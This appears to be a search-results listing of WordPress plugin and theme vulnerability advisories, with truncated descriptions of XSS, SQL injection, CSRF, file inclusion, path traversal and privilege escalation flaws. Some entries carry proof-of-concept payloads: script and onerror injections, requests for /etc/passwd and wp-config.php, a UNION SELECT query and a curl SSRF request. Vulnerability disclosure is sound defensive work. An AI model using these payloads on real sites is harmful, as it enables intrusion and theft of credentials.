4359 matches found
Mortgage Calculator / Loan Calculator < 1.5.17 - Contributor+ Stored Cross-Site Scripting
The plugin does not escape the some of the attributes of its mlcalc shortcode before outputting them, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks mlcalc schedule="month';alert/XSS///"...
Perfect Survey < 1.5.2 - Unauthenticated Stored Cross-Site Scripting
The plugin does not validate and escape the X-Forwarded-For header value before outputting it in the statistic page when the Anonymize IP setting of a survey is turned off, leading to a Stored Cross-Site Scripting issue jQuery.postdata: psquestions:1:"1", action:"savequestiondata", ID:"765",...
Pricing Table by Supsystic < 1.8.2 - Unauthenticated Stored XSS
No permission check on the ImportJSONTable endpoint allows for malicious javascript to be injected by unauthenticated users...
Minimal Coming Soon & Maintenance Mode < 2.15 - CSRF to Stored XSS and Setting Changes
This plugin had no nonce checks on any of the settings to verify that a request came from a legitimate source, such as a logged in administrative user. Therefore, creating a CSRF to stored XSS in addition to significant setting changes. alert1" /...
Relevanssi - A Better Search < 4.14.3 - Unauthenticated Stored Cross-Site Scripting
The plugin does not sanitise and escape user searches before outputting them in the related admin dashboard when the feature is enabled Enable the logging of user query, then was unauthenticated user /?s= The XSS will be triggered when an admin will view the User Searches dashboard at...
WP Visited Countries Reloaded < 3.1.1 - Reflected Cross-Site Scripting
The plugin does not escape the page parameter in its Countries dashboard before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...
Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta
An attacker could supply an array parameter for sensitive meta data such as the wpcapabilities user meta which defines a user’s role. During the registration process, submitted registration details were passed to the updateprofile function, and any respective metadata that was submitted, regardle...
Home Villas <= 2.2 - Multiple Cross-Site Scripting Issues
An Unauthenticated Reflected & Authenticated Persistent XSS vulnerabilities were discovered in the Home Villas theme through 2.2 for WordPress. Edit WPScanTeam: July 27th, 2020 - Confirmed & Escalated to Envato July 28th, 2020 - Envato Investigating August 17th, 2020 - No updates, disclosing...
Careerfy < 4.1.0 - Multiple Cross-Site Scripting (XSS) Issues
An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the Careerfy Job Board theme through 3.9.0 and 4.0.0 for WordPress. Authenticated Persistent XSS on the Candidate and Employer Profile pages. An Authenticated Persistent XSS @ Job Page will...
Contact Form 7 Datepicker <= 2.6.0 - Authenticated Stored Cross-Site Scripting (XSS)
Contact Form 7 Datepicker registers an AJAX action to save settings which calls a function that fails to perform a capability check or nonce check. As such, a logged-in attacker with minimal permissions such as a subscriber can send a crafted request which will store a malicious JavaScript in the...
CarSpot < 2.2.3 - Multiple Vulnerabilities
Multiple vulnerabilities was discovered in the 'CarSpot – Dealership Wordpress Classified Theme', tested version — v2.2.0: - Authenticated Persistent XSS - Registration Form/User Profile - Authenticated Persistent XSS - Ad Post - IDOR leading to arbitrary deletion of ads Edit WPScanTeam: January...
All in One SEO Pack < 3.6.2 - Authenticated Stored Cross-Site Scripting
This flaw allowed authenticated users with contributor level access or above the ability to inject malicious scripts that would be executed if a victim accessed the wp-admin panel’s ‘all posts’ page. "Exploit Post", "content" = "\nTest2\n", "status"="pending"; $postdata = jsonencode$data; //Get...
Newsletter < 6.7.7 - Authenticated Stored Cross-Site Scripting
An Authenticated Stored Cross-Site Scripting XSS was discovered within the Company Info "Motto" field. When creating a new newsletter using an empty template with the header module, the XSS would execute. This was later fixed in version: 6.7.7...
Master Slider <= 3.7.0 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin does not properly sanitise the slider name when creating or editing a slider, leading to an Authenticated editor+ Stored Cross-Site Scripting issue which will be triggered in the Slider table /wp-admin/admin.php?page=master-slider. Edit WPScanTeam: - The original report was from 2018,...
WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Description Authenticated Cross-Site Scripting XSS in post/page text editor mode. Editor user and up. link...
Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update
Due to the fact that Ultimate Member allowed the creation of new roles, this plugin also made it possible for site administrators to grant secondary Ultimate Member roles for all users upon a /wp-admin profile update. $wpuser, 'pwd' = $wppass, 'rememberme' = 'forever', 'wp-submit' = 'Log+In', ;...
CardGate < 3.1.16 - Unauthorised Payments Hijacking and Order Status Spoofing
Lack of origin authentication CWE-346 at IPN callback processing function allow even unauthorized attacker to remotely replace critical plugin settings merchant id, secret key etc with known to him and therefore bypass payment process eg. spoof order status by manually sending IPN callback reques...
EasyBook < 1.2.2 - Multiple Vulnerabilities
Multiple vulnerabilities was discovered in the 'EasyBook – Directory & Listing WordPress Theme', tested version — v1.2.1: - Unauthenticated Reflected XSS - Authenticated Persistent XSS - IDOR December 27th, 2019 - Envato Contacted January 6th, 2020 - Envato Investigating January ??th, 2020 -...
JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)
The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert/xss/%3C/script%3E&mimetype=text/html;%20charset=utf-8...
Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Cross-Site Scripting (XSS)
Cross-Site Scripting XSS vulnerability in the JSON output by modifying the hash parameter in admin-ajax.php using the fetchposts action. Response Content-Type set to html. http://www.example.com/wp-admin/admin-ajax.php?action=fetchposts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert1%3E...
Multiple Mediaburst/Clockwork Plugins - Cross-Site Scripting (XSS)
Reflected XSS via GET parameter "to". Vulnerable Plugins: ------------------------------------------ 1. Clockwork Free and Paid SMS Notifications URL: https://wordpress.org/plugins/mediaburst-email-to-sms/ Version 2.0.3 | By Clockwork 2. Two-Factor Authentication - Clockwork SMS URL:...
NewStatPress <= 1.0.4 - SQL Injection
The Search functionality is susceptible to a SQL Injection attack due to usage of user input without sanitation. In particular, at line 98 of 'includes/nspsearch.php'. Utilising a specially crafted SQL query, we can trigger disclosure of user hashes through an IMG tag as the data channel. The...
White Label CMS <= 1.5.2 - Stored XSS
Due to a lack of CSRF protection, and lack of sanitation of user input, it is possible to trigger a Persistent XSS attack via a CSRF attack. This attack targets in particular the Import functionality, which is located in the 'wlcmsImport' function, within the file...
SW Ajax WooCommerce Search < 1.2.8 - Unauthenticated Reflected XSS & XFS
An Unauthenticated Reflected XSS & XFS vulnerabilities were discovered in the SW Ajax WooCommerce Search plugin v1.2.6 for WordPress. The plugin comes with a number of commercial themes such as: OneMall, Revo, eMarket, Autusin, Market, MaxShop, ShoppyStore, Furnicom, EtroStore, HiTheme, StyleShop...
InJob < 3.3.8 - Reflected & Persistent XSS
Multiple XSS vulnerabilities have been founded in the 'InJob | Multi-purpose for recruitment WordPress Theme' theme v3.3.6. Edit WPScanTeam: September 16th, 2019 - Envato Contacted September 16th, 2019 - v3.3.7 released. XSS still present October 11th, 2019 - Envato contacted again for updates...
Form Maker by 10Web < 1.13.40 - Authenticated Reflected XSS
The 'Form Maker by 10Web' WordPress plugin is vulnerable to XSS in the 'blockedipsfm' page. A logged-in site administrator who follows a crafted link will trigger arbitrary JavaScript code to be run in their browser in the context of their privileged account on the WordPress site...
LearnDash < 3.1.2 - Reflected Cross Site Scripting (XSS) issue on the [ld_profile] search field.
Reflected Cross Site Scripting XSS issue on the ldprofile search field. First reported to Learndash on January 14, 2020, and update 3.1.2 to fix it was released same day. This report is based on an email LearnDash sent out to their users on January 14, 2020. From the Original Researcher Jinson...
iThemes Security <= 7.0.2 - Authenticated SQL Injection
The iThemes Security better-wp-security plugin before 7.0.3 for WordPress allows SQL Injection by attackers with Admin privileges via the logs page. Vulnerability description: iThemes Security appears to be vulnerable to time-based SQL-Injection. Parameter orderby is vulnerable because backend...
Multiple BestWebSoft Plugins - Authenticated Cross-Site Scripting (XSS)
http://www.example.com/wp-admin/admin.php?page=bwspanel&category=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%2842%29%3C%2Fscript%3E...
Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
Plugin is still affected and has been closed http://example.com/wp-content/plugins/mail-masta/inc/campaign/countofsend.php?pl=/etc/passwd...
Coming Soon Page, Under Construction & Maintenance Mode by SeedProd < 5.1.2 - Authenticated Stored Cross Site Scripting (XSS)
Authenticated stored cross-site scripting issues in some of the plugin settings, requiring high privileges. Affected fields are in the settings of the plugin and will be triggered when the common soon page is displayed either the preview or normal one: Logo: x' onerror='alert/XSS/ Headlines:...
Page Builder: PageLayer - Drag and Drop website builder < 1.1.2 - CSRF leading to XSS
A flaw allowed attackers to forge a request on behalf of a site’s administrator to modify the settings of the plugin which could allow for malicious Javascript injection...
wpCentral < 1.4.8 - Privilege Escalation
There’s a vulnerability that allows anyone who is logged in with any user role to escalate their privilege, or alter/upload any file, or adjust any plugin and interact with the site in many other ways. In wpcentral.php, AJAX actions are registered. However, it's only checking whether or not the...
Advanced Access Manager < 5.9.9 - Arbitrary File Access/Download
Advanced Access Manager before Version 5.9.9 allows reading arbitrary files without checking whether a user is allowed to read the given file. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers...
W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar
The implementation of opcacheflushfile calls fileexists with a parameter fully controlled by the user. curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flushfile&file=ftp://y.y.y.y:zzzz/' Note: The nonce value is given ...
NewStatPress <= 1.0.4 - Reflected Cross-Site Scripting (XSS)
The NewStatPress plugin utilizes on lines 28 and 31 of the file ‘includes/nspsearch.php’ several variables from the $GET scope, without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to trigger ...
WordPress 3.0-3.9.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
" onmouseover="alert'hello';"...
WPJobBoard < 5.7.0 - Unauthenticated Reflected XSS & XFS
Unauthenticated Reflected XSS & XFS vulnerabilities were discovered in the WPJobBoard plugin v5.6.4 for WordPress. Vulnerable parameters: query, location. Payloads: " " PoC Unauthenticated Reflected XSS:...
Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
The lack of authorisation checks in the handledownloads function, hooked to admininit could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. /wp-admin/admin-post.php?algwcpifdownloadfile=../../../../../wp-config.php...
SRS Simple Hits Counter <= 1.0.4 - Unauthenticated Blind SQL Injection
Alex Peña from Tenable discovered a blind SQL injection which could allow unauthenticated remote attackers to retrieve data from the DBMS. Note: The vendor attempted a fix in v1.0.4, which is incomplete. The PoC will be displayed once the issue has been remediated...
Easy Testimonials < 3.6 - Authenticated Stored Cross-Site Scripting (XSS)
Multiple cross-site scripting vulnerabilities in Easy Testimonials 3.5.2 and lower allow remote attackers to inject arbitrary web script or HTML via the Client Name, Position / Web Address / Other, Location Reviewed / Product Reviewed / Item Reviewed, Rating parameter. Successful exploitation of...
Tutor LMS < 1.5.3 - Cross-Site Request Forgery (CSRF)
Tutor LMS WordPress plugin is vulnerable to Cross-Site Request Forgery CSRF attacks. As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF attack to approve an attacker-controlled instructor account can be performed by having the admin visit...
Server Status by Hostname/IP <= 4.6 - Authenticated SQL Injection
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-admin/admin.php?page=all-servers&id=2+UNION+SELECT+1%2C2%2C3%2C%40%40version+&action=edit...
Ultimate Membership Pro <= 7.5 - Arbitrary media upload
The ajax-upload.php endpoint doesn't check for the current user's capabilities or that they are even logged in, so we can do a few things we shouldn't be able to do: Without any credentials, you can simply POST the image file in the field ihcfile and it'll store it for you: $ curl -F...
Delightful Downloads <= 1.6.6 - Unauthenticated Path Traversal
Since no authentication or authorisation checks for direct access to the jqueryFileTree.php are made, the vulnerability allows for browsing the file system on a host out of an unauthenticated context. Even though no file content can be exfiltrated this way, "hidden" files e.g. in the web...
WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
http://www.example.com/wp-admin/customize.php?theme= source: https://twitter.com/brutelogic/status/685105483397619713...
Elementor < 2.9.14 - Authenticated Stored Cross-Site Scripting
The template name is not properly sanitised when output back, leading to a stored XSS issue. Go to templates tab, click on "add new', and select page or section Then add XSS payload such as " on "name your template" field and hit create template...
Testimonial Rotator < 3.0.3 - Authenticated Stored Cross-Site Scripting (XSS)
A Stored XSS vulnerability has been found in the 'Author Information' textarea in testimonials from the plugin, which could allow an authenticated medium-privileged user contributor+ to inject arbitrary JavaScript. The XSS will be triggered for anyone visiting public posts or testimonial page...
Advanced Order Export For WooCommerce < 3.1.4 - Authenticated Cross-Site Scripting (XSS)
The Advanced Order Export plugin for WooCommerce versions 3.1.4 had a reflected XSS vulnerability due to lack of input sanitization on the woeposttype parameter. This allowed arbitrary HTML and JavaScript injection and execution in the context of the logged in user. On a WooCommerce installation...
Smart Marketing SMS and Newsletters Forms <= 1.1.1 - Unauthenticated Cross-Site Scripting (XSS)
The Smart Marketing SMS and Newsletters Forms WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. POST /wordpress/wp-content/plugins/smart-marketing-for-wp/admin/partials/custom/egoi-for-wp-formegoi.php HTTP/1.1 Host: 127.0.0.1 Content-Type:...